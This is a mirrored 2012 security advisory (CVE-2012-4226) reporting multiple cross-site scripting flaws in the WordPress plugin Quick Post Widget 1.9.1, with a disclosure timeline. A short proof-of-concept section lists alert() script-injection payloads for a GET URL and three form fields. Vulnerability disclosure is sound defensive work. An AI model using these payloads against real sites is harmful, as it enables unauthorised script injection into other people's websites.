Lucene search
Stefan SchurtzPACKETSTORM:115463HistoryAug 10, 2012 - 12:00 a.m.
WordPress Quick Post Widget 1.9.1 Cross Site Scripting
2012-08-1000:00:00
Stefan Schurtz
packetstormsecurity.com
17
0.016 Low
EPSS
Percentile
86.1%
`Advisory: WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-016
Author: Stefan Schurtz
Affected Software: Successfully tested on Quick Post Widget 1.9.1
Vendor URL: http://qpw.famvanakkeren.nl/
Vendor Status: informed
CVE-ID: CVE-2012-4226
==========================
Vulnerability Description
==========================
The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
// GET
http://[target]/wordpress/?"></script><script>alert(/xss/)</script>
// POST
http://[target]/wordpress/ -> Quickpost 'Title' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'Content' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'New category' -> "></script><script>alert(/xss/)</script>
=========
Solution
=========
-
====================
Disclosure Timeline
====================
02-Jul-2012 - developer informed
09-Jul-2012 - developer feedback
10-Aug-2012 - post on BugTraq
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-016.txt
`
Related
securityvulns
securityvulns
patchstack
patchstack
WordPress Quick Post Widget Plugin <= 1.9.1 - Multiple XSS
2012-08-09 00:00:00
wpvulndb
wpvulndb
Quick Post Widget 1.9.1 - Multiple Cross-Site Scripting (XSS)
2012-08-10 00:00:00
prion
prion
Cross site scripting
2014-09-03 14:55:00
cve
cve
CVE-2012-4226
2014-09-03 14:55:00